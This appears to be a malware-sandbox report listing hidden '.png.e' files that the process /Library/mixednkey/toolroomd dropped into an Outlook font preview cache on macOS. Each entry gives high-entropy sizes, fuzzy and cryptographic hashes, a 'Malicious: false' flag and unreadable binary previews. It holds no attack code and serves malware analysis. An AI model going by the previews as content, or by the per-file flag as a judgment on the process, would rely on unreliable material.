Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.r.^..(1..r.i.....!o..")..w{..5.......Xr.ZE.HX..G.IUh..~...@F.jy1T....GR......+....S>...(.,..+.CV...?{...k.&....v.&....va.n].u...t{x...9.,...0.?e..B..k.v..O"........O..%.+IvWH..n.;..g ..l...jA.:....:.R,SU_T.$.R7..}KQm..../....g.?..l......Q."M,...X.os..q..)....D..A.k...S.'...Za.1j.'E.[...LkT.8.fqDHb....PV.........a.w.....s.UEc.(..n..;...%..7..{.fZ}...XIdyP.....p..Fz2...7:.j+..i...o..2$...`z .T.D.C.'5..<`......#...w...N...)a.!....7..1.$..k.b..~.GO.c.Z=...{oo~. )..G.'..U.^.f...e...8.....i......?F.n.&.V.o"e.F.....W..\|.-Nt....r........&!.rN....\|.u.<.SfZ.{.....(1..\WV..!...r..vx.q.\|...k....#//.......X../...L,.Ed'..O....r..&.t.8.S.......H@2iq8$..y.f,..$.Q.2g.1U\|r..'.Zkw.......RlM........\|}. .Y.-.G....}YU..n....M.!.."./.g.p`.h.....[....t.e...s/.l.hZg.....3.r..<.:4]..}...;.6..b.J..a;.0.J..........Q....Q...^c)......H._;q. .......-.V_=_x..K.....t...jhG..b...`...............92...S.'{..*....2.t.).....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KailasaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	7.301617469562676
Encrypted:	false
SSDEEP:	24:YuP1SZw3wlMRbg5VZ54UmfRO+wO/GU1JXghGsePc0m7:YuP1S9MRc5b54n5LtGWpNpq
MD5:	AF4B541A0E80B0EEE6D5C12495341B4B
SHA1:	75A19A97FE9FBF71940FB77CEF35B782A7F5B3DF
SHA-256:	68A913C789D09307D8D515F4FC7DEB93F4876C28D19C4625B8F97AD7BA79F595
SHA-512:	23E239777906DD9D7744170FE874F9E9694AE1BD547A37377A323350661B0F409AA681BBBF41D8710863B47C0A23A55615E67068337327108E17E06DBA08586F
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a .k..+^.p....!.0e..K..r....d...#..u..)!.5...+\|\2Dk...G......{.t....F.V1.p[>.4.K...K.....^.E...b....E"s..}m............d..../......$.CLg..:...TVqs..,.....J7..Y...O...".....x.>@.2.d{.C.K...;..._z{.n..Y.....;.Tw-.`...&.....L5.J.:A.AS.JT....:...a...{..4X...m.-..@V.a.,......X..@...!..l..C...BP.5j.XB.b...P..d..u.W.q3...VU6.m..~I.G.0.T...N..U...{c.9...o.%....{V..g .}..O..fb....\.a...!.....;V..J.Uzy...Rez.Bt.1..%\..MN....._....\.9Y..}5g..p.}C!.8.p$....>{.g^B(....7.....(.u. <.k~...HA.Tf.2^...kp..U/`.L..W.......L.&.?L-,(...+....Y...^D..f.n...(..y.Y....G..</..Q...".......<...adi......2...'...qA2.....o.%.M...2...4DQ..-A._.1.m....0..>.).sen3.)...`...........?...0k.....F.....4Qb....@..0.3.0).....IW11PI..\|.+g.i....e.K^3..kr...S..._.L/M...g.Q.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kannada MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.496591813544403
Encrypted:	false
SSDEEP:	24:YuQI4xql6+oNuTP7T55HyiwkYs9TJQhMhv4jyv59NCTEJwOq3isePc0m7:YuQRxquuL7miwkYqrhvjv594KwOq3iNw
MD5:	D031145DDE4AB6DDE6C43E6B07A0C39B
SHA1:	FDABD946087F9E256364595E596B66D40BECC9E2
SHA-256:	5DBAFE87BFCD9FAC3FA69BEB7EF495B73A132704CD665E61B6C9CEA353FC90B8
SHA-512:	316B4BCE6C657E4B9B1C65D551FDE125690F2D3D0052B12BB0E23F6DD8A4D0A553D466A7D83FD8BF8582E19CD6271CCCD98F72096C21ECCA712C055D32944E9C
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a...uY...`uK}.e...N.....].I..2.&.Yf.....J....4..+...Z.a.......H.y].\...J_/.'.U/.E....Fv........>..D..{.....Yj./..i3^.C.6.(.Q. .,...".h+D.y.#.).../Sm`..4.a....b.La.u..U......j?g..:.v....C.3!...'...\|y......i...Q.x....`ll1.H...q.kg@..K..<f.5..h.n....}.L....9..g9.(.'.!.JKg.=..K.:.....=..Z.]....x.......,sI.A..n..Qxb.9...lZ.....k...I$.....5..>;.t4.8F.4.9.u....%....e...#.t.P..,+.~......._...Z. ]F%..[...7/1b.ix.g.}j..fS...<+.._..0.]....._...J&......-._...R.G..9.qf..;{.c;...x.o...e..'F3.nj.Tf.....g....e...1.f.....@Z.#...g{r.7... .X.....2...%.&.9...z.:........).u;.@.$.5u......}...>P..Q.q.^_t...L.Mv......@I.?..C~.{N!..........'...d'.;....bA..-$.P..d........DIQ&....]]a..<.I..s...k..q..\|...8...0[C~..../.G......sWL@c.bg+.3T...........,...iW.$8..M....wvy6..8.9o>R.hr7.....M.....z.......PJC ....[..o.E.\..;..i.G..aw..`.......y..*...~;......4.BX#.D4..E.m...g....m..1.6!Ki.H.U<yH..C{..r.pkL.1.$H... ...2&

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kannada Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	7.659237894756829
Encrypted:	false
SSDEEP:	48:+P87lYV0I02RF53SrwDnlUl0BQHUEU2X1gNpq:++8F53hDOl0BEUru
MD5:	8A64F6B9262300C7D1F98B6E28A00F82
SHA1:	7848CC74E41AA50D109FD983C47E6BA9C11CCD4F
SHA-256:	9658B81B90629D4B423AAD46A2BED3ED298D2C074F77C2B4ADE0D785D0D3F0A6
SHA-512:	53FAEA146C74EA57BAA880E6AEDA4257846F14E96D82F06D7B5133F6EB404F3C771E76AAED4A5A64FA96071CE4F8F6D9AEB9B119F685CBF2FC82EB05E804123A
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a.{.H#.....BD...W;&...>..4.9.2'..\.....m.......w$.^....].Qm.?....I..o....k..Yi2....q.....'V..[.1..<......U.I."...U.I."...U.I."...U.I."...)S....a.&.z.....M..]mL..8).'"q....2...L.r.........RJi./.60/.e..h.....!..,..q.uebB.h.K..[`.$.....7.EV...^..+8;.].$,.".....P.%.Z.........^.7s......H.e9L..1m.GZL.5.R..[C.Oo..<..oOHf?.p.."$&...%g......B...2:0.A.:..%.9Ed..in.(...,.(.-:._-..Q.s..C.:(i.hL.^.GOr.......8H..J.......#.M......pVM..}.d........tD\zr..*......Xp....V...oh..M.%.9.ZK.y..a-._...p..9..\|<a..!q..ic.f...9d.h.q.q}..;':./Tw..U..b.]..g.5...Zl.:...G...[..A.A!.?.\|e.5=%..5~.+.a29.\|...............V.Q}X.r,U..P..6.....z. M.~.q..3..k.L..uk..T...=..lX3.?..pvlA.v..W.....P...\.....fG....44...J.!.....F_G;...=`....D/..gtti^...3..V...x.A..$.3:l....RQ.K..Ogpr.....)..@.T..J.....p...Yq8.8h.1.X......[6.r.b.U....5..Nl.be.w?..........Xp)X..4...(.?.T5..8.._'.....[W..j...pSO..v./v.'"p.c....g....&D..X..5T..\|.9....k.N..'q1..k......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KartikaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1162
Entropy (8bit):	7.2565026903288805
Encrypted:	false
SSDEEP:	24:EzOrcDCa2inFujK/nrrt61OY0TSofhWZfvsAkNpsePc0m7:EzOrcDy1jOrIkBStZnsAknNpq
MD5:	4B682579757D121E338E41F9A1A9DFFB
SHA1:	57C450E38E9E528E52BE7A7EE3793D95CD060516
SHA-256:	FD518F8531EE0FA9660DE79C360107D0E86B1AFA24A68423E14A6EFC5D45F6E5
SHA-512:	48B1BCBB97A31803D1751A0E0CF0CB1ED5F65215D7C26F0061C555945F5B552BD6E435001FC49DE2324A6706DA4EA3D461416DC6A377F8E4C24083D790119286
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a+Gb...p:..c%Er.E.)$c..$..T^.zM.p..Z...D...=...Y.O.t..NX..'...wJ...'..d$..C.g\..jb.<..e...{X.........R.n.C..H...\.e8.....}.P`...;.>..Qa...x..K....t..Q. ....x{be...-..._....R.7B.c.....!B..L"9}.F..A.I....S.......p.Q._.....!...0)o..n.......k.".MMe<c.:.Z..#U.k1yF}..;y.xR..8RFb;.'\|...4...:....r....y.}.........vGv....1......'sA.h?[.qcG...=.V.y.x....>....hq.N.....4........:.....v.q.....l.......^........j..,.k......II.7..R.]..?c.x...{...#R..1.../.bh.D.QZ..X\|;j...:.j^a...di...8..@.P..W..(. W@M......../\|.W.x..o........1...#......V..@.Wq..w[..M..F.0S.8...n.N.2J.!e+..^Va...6..x..&..j.n...0.-...uj......kc,..;......Ae.....L...7..d'2.?.j.!...7...w..w....ir.K..fp.s.l.=.w.?.@.<?.!!h.n{.A...<:.1....Sx.N.....r.7...\.<.A....K}.&.^r..0.%..q'.M...:..R9........bi.Z.8.....Y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KefaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.236064025315289
Encrypted:	false
SSDEEP:	12:WvyOSYKQravkou1nN5fZS8eL28xDS8hplvz7IoDzGF3bbbtdOZEL7TsewLYTc+qf:ESYjGvk3NvMvx1vnn2bbpzsePc0m7
MD5:	23A16360BDD72E306FBF7DE5EE51750B
SHA1:	2FE8F50FA1EE982F9C8D8AA2276FA4924E8B7230
SHA-256:	F5A13D4C2A9224C071448FD2B0F94820F08F80D7416CE840C64D4491C3E349D6
SHA-512:	76100E5F75975A2D0964707F43D680910D1459DCC2AD366E6577E227D0E00BCA6F90AE9B01157E1F76A3DC5840419F69F89C02AAF88D658C8F62F6F649764183
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.v........:(...m..Ytt.......8a.M..d.B..+...%..dk.p..R..h`..oZ.....>..........$.p.`G..@..h.N:..6G.0......l...9$../&n.x....o=.d....T....!.........[.:..M...................+....n^...R.{OP..N......e..C.;>se......{.p...a.._.E.Y.U$.....G..W.DO....+.X.E#\|.. Hn,....v...V..b.%.U./...eg...Oo.W..c.........E.r._....n......@.n..t..q.....^.NvJ..y[.G.\.Ut..............e'#....Yot...`..f..o...Z.ohuH.:...<.?b"...7.......S....`..CUy.x.Zf.8.uP..HF....]...3...4.fM.d...I.....k.......I.4....,p-=....'...b....(Q..d...sc.u..^E.<.3w..-....h.......S.....i).Nb...nKq..E.JpzK...k.Z..w?......m..T.D.J..D.f....c..X.j..N:..6G.?P..z..rW2...k./..J.\-..S...}...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Khmer MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1194
Entropy (8bit):	7.332985439110494
Encrypted:	false
SSDEEP:	24:CeoJP+yhnpnUx4TxtfoFFPRyBLzq+86yryfLjxMGsePc0m7:CzsEpnUwpsFsBXo4BVNpq
MD5:	013914E5EA145418B017C76D8BDFF6EF
SHA1:	42F1D287CF6A9B06383C3CAC17FAB0A0517F6251
SHA-256:	6F8E264DCC9D41274E959C79246E775538D4E6ECD9E2835B6F3F65677CCE79F9
SHA-512:	AFA3E2E53567C82F8117A91BB08B72B9857B95D50D6463A51B14DCEF6D1F78835B59D0D611A501EE78A4F6E3001B4F1E1A7861295B06ED25664F3DFFEF73A2F3
Malicious:	false
Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.a.q...."....&....[NB.e..$CF..c..&.yn.j...S63.mmb....SV..1y.NVT.T`x.........t,.^(..c[R_.:.8{._u..m.J.;7...k.....U......J.;7...Z.^..0..Jf...)2../...+..z..c...(...3m.(..E....i..ijO...b..'u.....&..."8........v.&..........H....]........i.3..U...k......tp4.~.,N..B].t..>`.+X.[^....x!.R....%u.+./....XI......4.$[..}x....P+.......~....F..O...b'..r..Nr..(..V$.&...!..>G.y.8...m...%.;....;....dr..O...A...."....-.....$..f...G.fxs#..I..B...2y....jS....;.z..:..vAO..$.....M.5M.EW.....+..l..?k.8.Z..r.i....v}.{.>.5.ey'.`......._.q@^...a....=H.bm.......ZnLT..T....h.c....@....a0=.....(.~S..K....\|..6Z.}(.6._..a65../..2..L....c...G....;.t.E]t..Q.x_.3......^..9.$.s.....).............a<u.:.....[Qj........j-Y..O^$.K.P.T.:.8.P&..pb}.1..r..@...j..i1M.hN......>....."s..}m..8...D4..aLAqx....J.\-.S...s...y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Khmer Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1866
Entropy (8bit):	7.6101018926652895
Encrypted:	false
SSDEEP:	24:7jPbmrqAVMQJE8H7ySyi2oeIelbwXpSsslZNPx01hGQNYOfkFrLWtJromhsePc0q:7jbwk8ByeeIms+PxQhGiZMFrL+VhNpq
MD5:	28CF2CA3C8B4AD80215990B04EABA4E3
SHA1:	BB91870112E90393AC4DB8805DA4DF2A4CBF9AFC
SHA-256:	45B031F6CFA5CF911FA4196D34CBA56598178D7D54288E5B1CE5A563A7B79CD1
SHA-512:	65A4C14D5CC10912FC05DE50827D001B5A127E5F6C99845C3447B9FD2ADCEC7AF25E66F656AD077CDCFCF3DD70E19B3D593A2CFCB3984B0A3D3E347992D83BA2
Malicious:	false
Preview:	.<.\|.....f.A....g.$.e{.VM...J.d=.!...i .Y.a..?tu...^^..\|V.....(..~.a..F>.(%5Q..A/1..C......;7.....jj.9i\{.M.k..r..\.....z....5..c]Jx...'5;...W[..;-........):g...W_.....j....vD.&...j.$Za<..W3.=P.L.kW.o6........O..z.Ot.iz..'.g.....+.".(.......1.c..y..VrI...UaR.t..1...Y..Z^L....).;>-.a.k..2a....] ...;.].x.....ea.%......c.9.`20PN..;i.IR.g..AKEn.Q.$.C.a..n..N..&.~.0..?r........fy.eBb..9...s......_+.....J...'a......G...H........r2..U..%.. .].\..LO../..EX.g...lp6..f.0[\|..B.T`....*.P..g.6.....E?B..../...<$L..S..... ...Vc.j...h.#.&..{..3.ef.F...,+Je.n....^..t.;..K..U..[..S.d..r..BIC.z..l..r@..,.p&.9.E..(..mo.m.cb.U. ....&#..E.:....."].U<...mg.L..(.%I.....%-...i..z.x..(?^3&.u.U.;.P1'.......8..Fd..Lm.K..f4...x....l+].z~..Q..J.M..G.sZ..@Jc..8"kP.O7-4...@...^..k=;....>9K..w....@OX.....M9p..q..........&.8Vv.U.eJ....!.n.;MR.D.&l.........Nv-.F..?9...y.08..3.H.......X...J1...t..Hn...\|u.C...D...3......8b..g\|T.q7..?#.0..3d..,...X.f..j..%.$L;.0W...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kohinoor BanglaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.578101665811956
Encrypted:	false
SSDEEP:	48:EJkG4tRZR2HArLPufYabEfjPYe0Cs+0sZvNpq:hHtLHHQREhJs+0s1u
MD5:	64EF98F4707D918D3A3E91A55F758534
SHA1:	6369F6FB884EDA5E541AE0C404B0EF71313A85CB
SHA-256:	4C0554EC3DF06A9EC5198409EA3DB619C492F739E8452F26E99AAEBDEA8982E4
SHA-512:	282DAAFF46D09B983096BE69A6CA2D78F6031BEBEBF96048CB048C632FD6CC74E8F9459D47B492948694DEB8739727DC3FF09A97542A62276A7525553E46F3E2
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...$...'.8.9....b..:\|.....<.n#P.... .F.?k....&.$......iZ...S.q..;..v.V...gg....A.\|..h.`.XA'.Ha..O'.....2\|.#...........U.I."...U.I."u.U.:..7B2..`....z`k....V..X.q=L.......lX.{....Mr.]GI...'.........D....O.D.cBN.......D.Hh[afF.s.L...G.ISD..#&......3.Ma.(!.Y..Y...H.....'[.2..f.Y./.RI.....u..].K\]c^..(.....f.I.Q.1..^=.{....9.......&h1..J...h.4...>......3.a../D.f.8RI..Q.J\P.$..jRV=@)#TH.Jei.b@o.;...0....?... _.'2.....u....J../..,jy2.N...,...znl..J8.T.D..Xy.o.......;..9.{n......X^...x.W...kv[.O.O.<...<.'..JHLf-.r...}.S3....]..v.\|...E`..4.!...y..>+u...h.N.......1....=0K..U'Y.F...........(......vh..>Y..U.0..........V. ....#./co.FR..<0...Ji.%......5.t]s...g..........L.fnj.z...W.......(..`CS]..r.....0......H.D.....s........f........t.C.}.B.!.D..;.o..!..]..\|....2}.7..h...d'V{..z..\|s.>..hwm..O.$05...4.qA...y......w...(.x...s....y...R..y^.........w.Df}...p.......g...'q.o......e...q...`....o....D..Z

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kohinoor DevanagariRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1962
Entropy (8bit):	7.645442439720262
Encrypted:	false
SSDEEP:	48:EfBvTyBeAriDj4zlIxvbj87eMkbNDJrVGdPdcnGm6N1zlNpq:mBvTyBeOiX4ztKhJxGd6nirxu
MD5:	563B64225FD4A396E48485E87D6C06D6
SHA1:	4B680A75D7D99811C6FDFDC2B870EE7D42DF0312
SHA-256:	6611F5B4BF1686B5B041AF29464EB0F6E06343A3EF497036AADBD46553A6220F
SHA-512:	D7F1F31DE2455381224F34CC64497447F879F5322C5E56EC2DB612C2567D709D55218420100108FCE6984986174409A5D8E8C61B180EC83D6F5F0D227F2E804A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..]....w...2K..:S..d...h,..#.,..<.#.q.1sX..i,n...Vk.;2.l...\|..y..,....Tf.".W..........6.Y..I..w..[...".Em.:................>I.dj..N.r.!.....h...>.U..~+W.y8.xE.+.....W..N?%.?..........wj.....NU....-....L..._.[.g[ nwT.`./.8....T.......Gk...e...j.o..b..O..x."..[d..G....m.....d....N?...._5n.y...W...._. .A8.ocF...zSQ y~.?f.".l.v.V...%.E..#..6V.....7%.AD..x.......(.?...L...}.8.....5.lB.P.ryu.....H#.........C.. .......&/.~..X.7..r$.D....t.1.G....Q........$..< &...... ge<q...ai....~.....jd.M.~5.K.k..Kl..~.9..1..79.7..iN..N...ZyC@..T.{........o..u.A[.Re.qh..$I.b...z~.Y=].~2%.oc..._..sbqy.........iX3b...1.XY.)..r.Mq......03...+A..`......o`kv..<.mA....Y.f.@\..E......K...z...:,...c.r%..}.V......."....1n..e:.{..x.5;-..1UK....d ...%?.._}&n.........G.Uw.j.il]e$.\|..@.....7..E..Z..)...E..X"....).c.o....~N"..}.lT..l#B&F{.G.6..-.:.u.Y!;.j...w..+M@.i..a..b.@..1..E.c(..R........3.3.z.D+z......q.../..M..&O.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kohinoor TeluguRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	7.528016226731654
Encrypted:	false
SSDEEP:	24:E++NPdVbjHWJKYQsaok5W3Cvaa6v30Gx7DKIUb3dxHZD47/kWQsePc0m7:Ev3VXHytsASvLENx7DKIUzdxHEshNpq
MD5:	87ECEDD81DEDC15EC676237BBE6ADE5A
SHA1:	BFD70D9338BE97B90525D7D7EDA821F30B376174
SHA-256:	675BC39DF3C15A8D4E0BEA482D8F06B9CBC8C99D87C7FC0568DDA156209A025E
SHA-512:	1BDA4AD1C94A1382719575DA5658EF12B01818EEA3ABE3A7817FE12A1CCB283953D3F117254DFA19A53F0C72872A01D4CB7D8DCE13D1F91AF39D66C36C95EFBC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..........0....9C)....X_.XD.<~\|..I,....w.\......_.....2>.Am.E.$.^.......hH3eF....v..g.......8.......dFyb..H..g.h.......b..[.C..O......:BZ..;...NU.\...$-/].+.>..3.W`.....5.F....P].....8.B.[..Vs.....-.F.4.K.b...3=.O...A;.F....q..3..c..i.X<..\H6.W.]l.....Oji'.Y ;...K..FezZ1..u+..J...S....y...c..I;F...q^.L.O..~ /.d.R.y..p\.2-.g\|..A.....A.!..E..y....p..N.......>1.L6H..........Z.....-......sE..F....Jr..?.`k.;..x,W..C...:G&. .4.I.<&.i7j.d...h..o..[.nBN..d!../.cV...h..m.a..s...FC.[....=..>@.L...XT~.p..:=..@D.8......t.ed.."?z.L..!7/.A..>...6.IL"...!.5..............[..xa.zc?...}.(.. ...Ga.uL...$w`..P....F.E....F..s...G....r.3..?..".@...!. ..h.EleUK[.~\\|x.....Q/.....9fOd.]S..EF.#{.......s39?.=......-H^...U.3.#.I#...z..........h.?..b.cS....f).j.sF.s3...&{.@...u.q=lR...K.....3.q.o.c!..;.^....ET.Lucu.s._............bq..j'..... ....U...?..`t.bm.d....0.y.Q.....2L=y..SIG.9%...E..V.1/.P.j

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KokonorRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1194
Entropy (8bit):	7.323818661801932
Encrypted:	false
SSDEEP:	24:biFgUwOa7lywjwkWOEXaUdWEOBvhKWmGFVzWsePc0m7:biFxmywjxWNqUdnmKo7yNpq
MD5:	AC0D46335A644FCD8EFA8A1CB1B10F84
SHA1:	A171C392C4DFAB928B2B1A6A0FD039BB09265F63
SHA-256:	DCFAFE4DD933790CAD2075D9BEEA4ED05B13758D5323BB6E45B0A4C5C0D17D71
SHA-512:	8D80410428C3B2C56711FB06D2A2EA6BC50254771AD523DFEF27FAD5929F8C89FEB6A2AFA03F050ACBDBA3FFA720CECB6E28D3B20169ACAFE6C5A59D670E34BD
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a..aF.-.K..8...x./.......X.7...aD.R.aZ..?\....d.\......w.@..._.p.L......L....F.......9.....4.r..Quw..f...@..i.#Y'za.(V...v./......D.l.Q.G7..F.(.%........H?.nD...3.K..>\O.hQ...j...z.....(.l.X...ur...m....>6a.v1..h..O...=l........h.@....\| .<...D<....\...`a...JYn.g..Uk../o...C.....Sd8J....!P.7.<.Mb.R80.....^X..@QS..(...s}.......8....?.}.CfD.'{.."x=...-B.O..3\|...~.-..O.Q..._.Z..i.KO!s.O...F"J.6.?S..I.CJS..I.......{.....~.^....sn.8#q:. ..iY..{.X.........,.nf..S..Z..6J..Wf...q..Yu..E`"..U..#.p..#Ob..c..fDngR..su.d{...i.[..{m.X....J.-.J........at.M.).d........2.d.^....b.K.. .........B6..-......R....U....[-.....;.......H..xO3.....9....r..{.J)&.vt%.FWT.[Q.B4...uV..3oD.............@..im-........".W....d..e..e....I.......K3_nl.VNA.....Quw..f..BgqJ..#_.f..zv.!0.>..l.F....8...Z7.E\.:3.q.o.c!.y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KrungthepRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.458165216915127
Encrypted:	false
SSDEEP:	24:EusOASzzSpCWAhPyYS0yPwnbyYQ5vjRqZHQKqqHEsgvfDsePc0m7:Eu5z+CcdYneBMZwKxGNpq
MD5:	8307398341493CF4D298F2B84CFB7C3E
SHA1:	D1ED7CEA943FC957F04D45339D84E96807B7C45A
SHA-256:	BAB528A2125DB055E594C6DA5F506DDFF9CC8770DDBD6F7F97CB757FD90FB853
SHA-512:	235B67877FF2E44B3BA3C06D3AE4CA41929C0A6C04592973E98863C733FB7775F08EB6931A55B1D41985D7203F328FE82DABF3D7E7026BD40E647FBC9E37A276
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aj.5e\..h...t.\|.%......,....p..jN.W........0..P9...g.d'..X...h_.}.!W.c.H/.n.#...i.7.MG$vC.}....\.L..W3.=P.L....o.....~.g yz/F3h....Z....\|..Q~..C.[W......#Y.."..ua.PM$O..9XV..eS.V...0+.^.6.89........>...M>e.....}.`.....4..w7%.L.....q.6.G.;....NmP.&GU.....\8;.ch%.:..Z\|...~.-b2e....<....cw..po{....\2.d.7...m..]....K.w.no...p...1...i.~Td...i[.H5..@..H.8.[ ....6.Cv....z...r........F.....r\..n.8.~..C3e..................+...s.L.&...z7.m.m..s8y.L....'.9U.i....$..... ;C1.5.^.......=...A.Da.....D.8}."1...E..L.c....L&...>..._..p..+T.L.&X" .".t......^...G..M1m..F...Bl.<......6....b...Z..IN...tgo.5.K...;...l1.$Q.I.q.C...%..#.iB...o...._...('a......J .........@....@g.$ ..JKs7f....d..R%....8..3B...u.C.NS...N..sp.qf.Np.....6Z.....U.<>..........{.?6/..Jd+..L.4...+F. ..l.....d..V..X...)`...8t~..m.O...r.I.t.Y.8.$......=....+^\|l&U/...L;q.b4..v&....m.&u..).S..zu..K.tKA.1....Rk.g_...+t...<K.....#m.4.....SM....fX

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KufiStandardGKRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1890
Entropy (8bit):	7.606062300339752
Encrypted:	false
SSDEEP:	24:E7R8nJJckq1CyycCyP8E6MSxr/vZ7hoKCQMVyJRtDqkPqYzVwHs1bbcqmRP8FsTi:ElKzcHAtvMcdxPTmc3cRUFslaGNpq
MD5:	FCBA8F389034940E1776F63A3DD79B4A
SHA1:	0F75D4814DE79DDCF80C0935CD4B696B430B3B8E
SHA-256:	7468C5663B5396F7E89036C98A1891E3878C53F857920A0955FFD8B1420812A5
SHA-512:	3D03A51AD86003C7EE566681FC24AA389C8F83FEF36B845F0D0DDE90B1E062FF67B8EB25E36A2ED8F0FD00B83B35348B08F7E037B6E48BF6FFCC2F1D315C6F7E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.}q....M3.(..]T..Z=k.......w.u..].-gUA..].+$...q#2RK.........HF.;.nL .\.5e..\|yh).W...g..$..>.H...o..y.p..u.....u.....u...........R.^..^.......-p.JI.'..\|k.!.n.....C.)(.ca=`...@.Y)\.....W"...................a+....}e.&i(..-..&.M4=.w...\|.x"L0.k.......,..fyH~\...T.H....\|...p.'..$.p...g..W5............U.H...k8...k.E.U....in.{..o..u.'.][.j=..,.F...m?8....4L...."}..D..[=re....%..HB..e.c\.\.\.(.b.9t\7Ry..;T.VZRJ......z...!\..X.3.2..>$^...Wrab.)JT7.ygDw......VA..&.'....c...Yb...M.....7./.'u..j..VxC..~.\.c.Th..T....Z...V.o8b.T.b8..F......q.6"..];.-#~..U...A...Ay..Tx..ig.....~..xQ....G....$.....FV...u.a.9.<..."./.-...;.g.\|.z.K.....&...7E...T~..Ty....."..+.....{Z.'......j ...].]!e.U.i......../&.U...$.S.p.0...!.r.. L...7A.TA?.....QrA...<E.M...........c.H...V...]T.H,$.....R_...+..3m..K...*\L.k..!......?m......X)...q......m..;..b.X.....\.g.K.$S...H.Xk.......4....K...N)..nr..cXa....4..q....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Lao MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.215534944867999
Encrypted:	false
SSDEEP:	24:EYYxZOYln0SvovN5a795YNBPTtlsePc0m7:EYYxUYlxwv/a795YNZTtlNpq
MD5:	F04D840FBF7BE377B5D59A7BE8A695B3
SHA1:	82ACBD60C2D07E8404BD766EFA94D0F1B8976ED6
SHA-256:	1D2F7A9D1C750034188829434A0BE0E9B5C4F35D0996852CB9D8507FA0A74D82
